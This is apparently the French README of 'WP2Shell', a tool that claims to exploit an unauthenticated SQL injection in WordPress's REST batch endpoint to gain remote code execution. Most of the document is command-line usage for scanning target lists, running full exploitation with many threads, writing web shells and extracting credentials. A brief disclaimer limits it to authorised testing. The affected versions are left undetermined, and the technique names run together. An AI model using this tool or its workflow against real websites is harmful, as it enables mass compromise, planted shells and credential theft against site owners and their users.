
WP2Shell - CVE-2026-63030 / CVE-2026-60137 Cet outil exploite une vulnérabilité critique d'injection SQL dans le point de terminaison `/wp-json/batch/v1` de l'API REST WordPress, permettant à des attaquants non authentifiés d'exécuter des requêtes SQL arbitraires et de parvenir à une exécution de code à distance (RCE) sur des installations WordPress vulnérables.
Outil complet de découverte et d'exploitation de la vulnérabilité de l'endpoint Batch de l'API REST WordPress.
Cet outil exploite une vulnérabilité critique d'injection SQL dans l'endpoint /wp-json/batch/v1 de l'API REST WordPress, permettant à des attaquants non authentifiés d'exécuter des requêtes SQL arbitraires et d'obtenir une exécution de code à distance (RCE) sur les installations WordPress vulnérables.
Vulnérabilité : CVE-2026-63030 / CVE-2026-60137
Vecteur : endpoint Batch de l'API REST WordPress (/wp-json/batch/v1) injection SQL
Impact : RCE non authentifié
Versions affectées : WordPress 6.4.x et versions antérieures (versions spécifiques à déterminer)
SLEEP()ORDER BYINTO OUTFILE (lorsque c'est autorisé)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- Rapport JSON : données structurées avec l'état de la vulnérabilité et les identifiants extraits
2- Rapport HTML : visualisation élégante et colorée avec des URL de shell cliquables
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. L'auteur décline toute responsabilité en cas d'utilisation abusive.